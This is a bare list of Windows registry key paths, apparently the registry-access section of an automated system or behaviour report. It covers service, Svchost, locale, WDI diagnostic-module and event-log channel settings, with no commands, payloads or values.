HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical HKEY_LOCAL_MACHINE\Software\Classes HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\svchost.exe HKEY_CURRENT_USER HKEY_CURRENT_USER\Control Panel\International HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control Panel\International\sTimeFormat HKEY_CURRENT_USER\Control Panel\International\sShortTime HKEY_CURRENT_USER\Control Panel\International\s1159 HKEY_CURRENT_USER\Control Panel\International\s2359 HKEY_CURRENT_USER\Control Panel\International\sShortDate HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_CURRENT_USER\Control Panel\International\sLongDate HKEY_CURRENT_USER\Control Panel\International\iCountry HKEY_CURRENT_USER\Control Panel\International\iMeasure HKEY_CURRENT_USER\Control Panel\International\iPaperSize HKEY_CURRENT_USER\Control Panel\International\iDigits HKEY_CURRENT_USER\Control Panel\International\iLZero HKEY_CURRENT_USER\Control Panel\International\iNegNumber HKEY_CURRENT_USER\Control Panel\International\NumShape HKEY_CURRENT_USER\Control Panel\International\iCurrDigits HKEY_CURRENT_USER\Control Panel\International\iCurrency HKEY_CURRENT_USER\Control Panel\International\iNegCurr HKEY_CURRENT_USER\Control Panel\International\iCalendarType HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop HKEY_CURRENT_USER\Software\Classes\AppID\taskhost.exe HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\DiagnosticModules HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\Config HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson HKEY_LOCAL_MACHINE\Software\Microsoft\RADAR\HeapLeakDetection\Settings HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FilterId 